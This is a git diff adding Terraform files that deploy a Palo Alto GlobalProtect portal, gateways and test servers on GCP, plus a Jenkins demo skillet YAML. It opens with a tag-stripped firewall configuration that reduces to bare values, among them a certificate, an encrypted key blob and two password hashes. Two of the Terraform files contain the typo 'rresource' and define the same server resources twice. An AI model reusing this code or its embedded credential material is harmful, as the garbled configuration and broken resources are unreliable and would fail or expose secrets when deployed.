IYfmquiAFEr+77ppyv9+9rZmHutHTOYiR1XdctAr/7w+l2+QIbGwOJXPrjVi1N9iYPPGvMHbTXcbKrcMk3jWAepapt4wah+MMcnnEiKXz8UxdrlU2yBbMcbuczb8JzZeqbf65g+3+5waM58WBUeB2fCCZiwTDy/WMskrfFCk1b6NGFobBDD4Hafr8oQRlKzByRAvmrCvlgqBUkmGDWRcHoPKiAFykhFPGW9V6heB2Lwt/RQM2eqsqqKHFSM6Vdo8hRgwgAsjeuaDAuMHzYZgvEs3lgaxjrE9RH0srr59/XeDr5syYkUBmVjPm+e5A45kXJrxdZCN8aOGvV1Kk2KFoIicl3nF6DMiUUjfcmT9PVF58Dh++L6mViZ7Yy+JG8Y3ekTWaNX9J+oM8JRemfri1LhBu3AH+dqs9CV2uAl8vZte2z8e7CCO8lHuMZsnRWpw/x+vqGYyAIBHEm1UdAG7WtH0dHBSK7Rt/ySJWGxHZlsLbxohnc/jObwEbT60FgFGqEQ7GWOD1jJpuEWhDchJOc9yVEZ/YWqNTkt1dIzh13JcU7XiKzX/xBrUVzdqYBRyvTyDwXeMz8k+3je1YWbkBxY9KnjMmFNM4BADHk7+LQHiu5f2H1e+gYH65q4A30+xsRSr9SGkJeQHlOXn9zYX+9qbjoaXQLlF4FMTz6zK46d6/jbw8bl8wZ1MBFNHoqCh0pqyeZEVNx3GN4O8tE+Ga9CnNLlkirP2+pCK2aC+4crdGqjYK65OijyRV8x/MfpS5wXsTA0tgLbC+ttlfEliafjnfK7jaLzXoM19a4s516w20IURrWscMj6rJJAayOnqcCOt56L2tMTeILSZ/csp2wxuj6gIf3BMNO1O9zShd1HX4XB9jO5n3QNposPsujmsnb1xyq7Cqg11WKDImBZPO38YA1NhNMuepbi6InM6BZPycnq0cTG3qinu8PDuWakbz96lMdRveoCR9Nx0uHAO2FS6pd+/9RFA3x0HqgQtwy1rUkFYhVrjuE9Ykw6j3FzkdiLmWNEhSGDxOD+gw5+kJTw8487I/qHB2yGtSsdloepF2xfqBEAyhkkYOeHve2ha0anu4NEvJvigkwTu00TkPCbjiqIzzxL+HR6BnzvLg+p6uilys5H6rFM3UXf0HbPc/l
+
+
+ a0cb01b7
+ e8d8421e
+ Mar 25 14:05:09 2020 GMT
+ /CN=GP-CA
+ Mar 25 14:05:09 2021 GMT
+ dummy-gw-cert
+ 1616681109
+ no
+ /CN=dummy-gw-cert
+ -----BEGIN CERTIFICATE-----
+MIIDEzCCAfugAwIBAgIEa51q3DANBgkqhkiG9w0BAQsFADAQMQ4wDAYDVQQDEwVH
+UC1DQTAeFw0yMDAzMjUxNDA1MDlaFw0yMTAzMjUxNDA1MDlaMBgxFjAUBgNVBAMT
+DWR1bW15LWd3LWNlcnQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC7
+5By6OdRX2G2leyF+aVtOXZGKlCR0RUPPQckzIxTOs8duBwPJmXPGLpeh13tVJtEv
+09bOpjHGOqJFfm/CO0R0NIxyMF4IurTIbw7eGGP/jg/SMXVi/XNTy2TRGteVJUch
+jzxPpZiIxJmo5fzI7aKcxUXobuO+495u6tsHxYevmpg28RacK74GMqoGTC8+E1d2
+fXd0qMQyseuJsU6zEWOqwjEsC0Gqhwbq4byhdQbJW2juaSD1piv89Ed75MH7btUR
+DJKHRnhNMcvpDnoH3IlQynRtLHUQjxlXUBRWlrCCjUOd0a/XWNgjT69iDa6K0V4s
+WkH9QIaOGotafVZShYU/AgMBAAGjbTBrMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgO4
+MCcGA1UdJQQgMB4GCCsGAQUFBwMBBggrBgEFBQcDAgYIKwYBBQUHAwUwCQYDVR0j
+BAIwADAdBgNVHQ4EFgQUzD9VvicyV2Bx4njYSjUHMYPqGe4wDQYJKoZIhvcNAQEL
+BQADggEBAAwXTc9lMGZurI7j7BmxF5vNdRf86rwSJK70S/WMm7BHfFo4eRdqoa+J
+Q90nm89osWMT3aXKriZ+ge7iq5jtu5r4vOPKelEbEa6vuXg2eaHpL23HBUxeTkNI
+DxfYhMogoKFoiX9/zRBy+8lWz4b2IquAcjWFA4GWPfX+JtAUDpwAQFyIBxU0x4wy
+hy8kLsAh+tuZfWgTFrYBS0tiV62Amtcl3/+G/zyoQ2orKtTHPBTaHOG3d3zLsQJ3
+c+PZn6KlSWAf2VthbbPnn1hvMxU+c7w2lWQX64FSzLt4LQSol7qnyLROgFKTKVXG
+EB826Ks5mv+qxogo1C6hLvdpiHUp+ys=
+-----END CERTIFICATE-----
+
+ RSA
+ -AQ==B+uxEDleVDIXpf2wVEueVGEMvc4=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
+
+
+
+
+
+ tls1-0
+ max
+
+ dummy-portal-cert
+
+
+
+
+
+
+
+
+ all
+
+
+
+
+
+
+ $1$kobgpbqd$tCeUrtyaJNKirLxMwLs/o1
+
+
+ $1$xgwfehpw$rdQRIHTfNVtUZIdeunXHG1
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+ traffic
+ All Logs
+ yes
+
+
+ threat
+ All Logs
+ yes
+
+
+ wildfire
+ All Logs
+ yes
+
+
+ url
+ All Logs
+ yes
+
+
+ data
+ All Logs
+ yes
+
+
+ tunnel
+ All Logs
+ yes
+
+
+ auth
+ All Logs
+ yes
+
+
+
+
+
+
+
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt b/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt
new file mode 100644
index 00000000..3606b11c
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt
@@ -0,0 +1,14 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-1
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt b/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt
@@ -0,0 +1 @@
+
diff --git a/gcp/GP-NoAutoScaling/gateways.tf b/gcp/GP-NoAutoScaling/gateways.tf
new file mode 100644
index 00000000..eb72ede5
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/gateways.tf
@@ -0,0 +1,121 @@
+resource "google_compute_address" "gp_gateway1_management" {
+ name = "gp-gateway1-management"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_address" "gp_gateway1_untrust" {
+ name = "gp-gateway1-untrust"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_instance" "gateway1" {
+ project = google_project.globalprotect.number
+ name = "gp-gateway1"
+ machine_type = var.FW_Machine_Type
+ zone = data.google_compute_zones.available.names[0]
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ metadata = {
+ vmseries-bootstrap-gce-storagebucket = google_storage_bucket.gateway_bucket.name
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.untrust_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_gateway1_untrust.address
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.management_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_gateway1_management.address
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.trust_subnet.self_link
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.FW_Image}-${var.FW_PanOS}"
+ type = "pd-ssd"
+ }
+ }
+}
+
+resource "google_compute_address" "gp_gateway2_management" {
+ name = "gp-gateway2-management"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_address" "gp_gateway2_untrust" {
+ name = "gp-gateway2-untrust"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_instance" "gateway2" {
+ project = google_project.globalprotect.number
+ name = "gp-gateway2"
+ machine_type = var.FW_Machine_Type
+ zone = data.google_compute_zones.available.names[1]
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ metadata = {
+ vmseries-bootstrap-gce-storagebucket = google_storage_bucket.gateway_bucket.name
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.untrust_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_gateway2_untrust.address
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.management_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_gateway2_management.address
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.trust_subnet.self_link
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.FW_Image}-${var.FW_PanOS}"
+ type = "pd-ssd"
+ }
+ }
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/gcp_firewall.tf b/gcp/GP-NoAutoScaling/gcp_firewall.tf
new file mode 100644
index 00000000..afa4bc13
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/gcp_firewall.tf
@@ -0,0 +1,33 @@
+resource "google_compute_firewall" "management" {
+ name = "management-firewall"
+ project = google_project.globalprotect.number
+ network = google_compute_network.management_network.name
+ allow {
+ protocol = "tcp"
+ ports = ["22", "443"]
+ }
+}
+resource "google_compute_firewall" "untrust" {
+ name = "untrust-firewall"
+ project = google_project.globalprotect.number
+ network = google_compute_network.untrust_network.name
+ allow {
+ protocol = "tcp"
+ ports = ["443"]
+ }
+ allow {
+ protocol = "udp"
+ ports = ["500","4500","4501"]
+ }
+ allow {
+ protocol = "esp"
+ }
+}
+resource "google_compute_firewall" "trust" {
+ name = "trust-firewall"
+ project = google_project.globalprotect.number
+ network = google_compute_network.trust_network.name
+ allow {
+ protocol = "all"
+ }
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/images/GP_in_GCP.png b/gcp/GP-NoAutoScaling/images/GP_in_GCP.png
new file mode 100644
index 00000000..989ebab3
Binary files /dev/null and b/gcp/GP-NoAutoScaling/images/GP_in_GCP.png differ
diff --git a/gcp/GP-NoAutoScaling/main.tf b/gcp/GP-NoAutoScaling/main.tf
new file mode 100644
index 00000000..c6940ef9
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/main.tf
@@ -0,0 +1,3 @@
+provider "google" {}
+
+provider "random" {}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/output.tf b/gcp/GP-NoAutoScaling/output.tf
new file mode 100644
index 00000000..754d45d4
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/output.tf
@@ -0,0 +1,11 @@
+output "Portal-Management-IP" {
+ value = "${google_compute_instance.portal.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "Gateway1-Management-IP" {
+ value = "${google_compute_instance.gateway1.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "Gateway2-Management-IP" {
+ value = "${google_compute_instance.gateway2.network_interface.1.access_config.0.nat_ip}"
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/portal.tf b/gcp/GP-NoAutoScaling/portal.tf
new file mode 100644
index 00000000..dfed3411
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/portal.tf
@@ -0,0 +1,56 @@
+resource "google_compute_address" "gp_portal_management" {
+ name = "gp-portal-management"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_address" "gp_portal_untrust" {
+ name = "gp-portal-untrust"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_instance" "portal" {
+ project = google_project.globalprotect.number
+ name = "gp-portal"
+ machine_type = var.FW_Machine_Type
+ zone = data.google_compute_zones.available.names[0]
+ can_ip_forward = false
+ allow_stopping_for_update = true
+ metadata = {
+ vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.untrust_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_portal_untrust.address
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.management_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_portal_management.address
+ }
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.FW_Image}-${var.FW_PanOS}"
+ type = "pd-ssd"
+ }
+ }
+}
diff --git a/gcp/GP-NoAutoScaling/project.tf b/gcp/GP-NoAutoScaling/project.tf
new file mode 100644
index 00000000..e44a7ff4
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/project.tf
@@ -0,0 +1,19 @@
+resource "random_id" "random_number" {
+ byte_length = 2
+}
+resource "google_project" "globalprotect" {
+ name = "${var.Base_Project_Name}-${random_id.random_number.hex}"
+ project_id = "${var.Base_Project_Name}-${random_id.random_number.hex}"
+ billing_account = var.Billing_Account
+ auto_create_network = false
+}
+resource "google_project_service" "globalprotect" {
+ project = google_project.globalprotect.number
+ service = "storage-api.googleapis.com"
+ disable_dependent_services = true
+}
+
+data "google_compute_zones" "available" {
+ project = google_project.globalprotect.project_id
+ region = var.GCP_Region
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/servers.tf b/gcp/GP-NoAutoScaling/servers.tf
new file mode 100644
index 00000000..f503ff40
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/servers.tf
@@ -0,0 +1,77 @@
+resource "google_compute_instance" "server1" {
+ name = "server1"
+ project = google_project.globalprotect.number
+ zone = data.google_compute_zones.available.names[0]
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts = {
+ create = "15m"
+ delete = "60m"
+ }
+
+ metadata = {
+ vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.management_subnet.self_link
+ access_config {}
+ }
+}
+
+rresource "google_compute_instance" "server2" {
+ name = "server2"
+ project = google_project.globalprotect.number
+ zone = data.google_compute_zones.available.names[1]
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts = {
+ create = "15m"
+ delete = "60m"
+ }
+
+ metadata = {
+ vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.management_subnet.self_link
+ access_config {}
+ }
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/terraform.tfvars b/gcp/GP-NoAutoScaling/terraform.tfvars
new file mode 100644
index 00000000..780ca566
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/terraform.tfvars
@@ -0,0 +1,22 @@
+Billing_Account = ""
+
+Base_Project_Name = ""
+
+Public_Key_Path = "~/.ssh/id_rsa.pub"
+
+GCP_Region = ""
+
+#FW_PanOS = "byol-904" # Uncomment for PAN-OS 9.0.4 - BYOL
+FW_PanOS = "bundle1-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1
+#FW_PanOS = "bundle2-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2
+
+FW_Image = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
+
+
+Management_Subnet_CIDR = "10.0.0.0/24"
+
+Untrust_Subnet_CIDR = "10.0.1.0/24"
+
+Trust_Subnet_CIDR = "10.0.2.0/24"
+
+FW_Machine_Type = "n1-standard-4"
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/variables.tf b/gcp/GP-NoAutoScaling/variables.tf
new file mode 100644
index 00000000..fb7a8311
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/variables.tf
@@ -0,0 +1,10 @@
+variable Billing_Account {}
+variable Base_Project_Name {}
+variable Public_Key_Path {}
+variable GCP_Region {}
+variable Management_Subnet_CIDR {}
+variable Untrust_Subnet_CIDR {}
+variable Trust_Subnet_CIDR {}
+variable FW_Machine_Type {}
+variable FW_PanOS {}
+variable FW_Image {}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/vpc-subnets.tf b/gcp/GP-NoAutoScaling/vpc-subnets.tf
new file mode 100644
index 00000000..5373f55c
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/vpc-subnets.tf
@@ -0,0 +1,36 @@
+resource "google_compute_network" "management_network" {
+ project = google_project.globalprotect.number
+ name = "management"
+ auto_create_subnetworks = false
+}
+resource "google_compute_network" "untrust_network" {
+ project = google_project.globalprotect.number
+ name = "untrust"
+ auto_create_subnetworks = false
+}
+resource "google_compute_network" "trust_network" {
+ project = google_project.globalprotect.number
+ name = "trust"
+ auto_create_subnetworks = false
+}
+resource "google_compute_subnetwork" "management_subnet" {
+ name = "management"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+ ip_cidr_range = var.Management_Subnet_CIDR
+ network = google_compute_network.management_network.self_link
+}
+resource "google_compute_subnetwork" "untrust_subnet" {
+ name = "untrust"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+ ip_cidr_range = var.Untrust_Subnet_CIDR
+ network = google_compute_network.untrust_network.self_link
+}
+resource "google_compute_subnetwork" "trust_subnet" {
+ name = "trust"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+ ip_cidr_range = var.Trust_Subnet_CIDR
+ network = google_compute_network.trust_network.self_link
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/webservers.tf b/gcp/GP-NoAutoScaling/webservers.tf
new file mode 100644
index 00000000..cbf1c424
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/webservers.tf
@@ -0,0 +1,75 @@
+resource "google_compute_instance" "server1" {
+ name = "server1"
+ project = google_project.globalprotect.number
+ zone = data.google_compute_zones.available.names[0]
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts = {
+ create = "15m"
+ delete = "60m"
+ }
+
+ metadata = {
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1804-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.trust_subnet.self_link
+ access_config {}
+ }
+}
+
+rresource "google_compute_instance" "server2" {
+ name = "server2"
+ project = google_project.globalprotect.number
+ zone = data.google_compute_zones.available.names[1]
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts = {
+ create = "15m"
+ delete = "60m"
+ }
+
+ metadata = {
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1804-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.trust_subnet.self_link
+ access_config {}
+ }
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
new file mode 100644
index 00000000..ae3c0a1b
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
@@ -0,0 +1,88 @@
+name: gcp_jenkins_exp
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 1 Infrastructure Deployment Build
+
+description: >
+ This skillet deploys the Security Framework Azure Jenkins Exploit Protection environment. The template deploy the Following:
+ GCP Projects, VPC's, Route Tables, Subnets, Availability Zones, Load Balancers and Native Security tools WAF and Network Security Groups.
+ The Template will also deploy Palo Alto Networks Firewall with security posture.
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+ collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+ - name: username
+ description: FW Username
+ default: admin
+ type_hint: text
+ - name: password
+ description: FW Password
+ default:
+ type_hint: password
+ - name: GCP_Region
+ description: GCP Region
+ default: us-central1
+ type_hint: dropdown
+ dd_list:
+ - key: "US-Central-1 (Iowa)"
+ value: "us-central1"
+ - key: "US-East-1 (South Carolina)"
+ value: "us-east1"
+ - key: "US-East-4 (Virginia)"
+ value: "us-east4"
+ - key: "US-West-1 (Oregon)"
+ value: "us-west1"
+ - key: "US-West-2 (California)"
+ value: "us-west2"
+ - key: "Europe-North-1 (Finland)"
+ value: "europe-north1"
+ - key: "Europe-West-1 (Belgium)"
+ value: "europe-west1"
+ - key: "Europe-West-2 (UK)"
+ value: "europe-west2"
+ - key: "Europe-West-3 (Germany)"
+ value: "europe-west3"
+ - key: "Europe-West-4 (Netherlands)"
+ value: "europe-west4"
+ - key: "Europe-West-6 (Switzerland)"
+ value: "europe-west6"
+ - key: "North-America-Northeast-1 (Canada)"
+ value: "northamerica-northeast1"
+ - key: "South-America-East-1 (Brazil)"
+ value: "southamerica-east1"
+ - key: "Asia-East-1 (Taiwan)"
+ value: "asia-east1"
+ - key: "Asia-East-2 (Hong Kong)"
+ value: "asia-east2"
+ - key: "Asia-Northeast-1 (Tokyo)"
+ value: "asia-northeast1"
+ - key: "Asia-Northeast-2 (Osaka)"
+ value: "asia-northeast2"
+ - key: "Asia-South-1 (India)"
+ value: "asia-south1"
+ - key: "Asia-Southeast-1 (Singapore)"
+ value: "asia-southeast1"
+ - key: "Australia-Southeast-1 (Australia)"
+ value: "australia-southeast1"
+ - name: Billing_Account
+ description: GCP Billing Account
+ default:
+ type_hint: text
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+ - name: script
+ file: ../../deploy.py
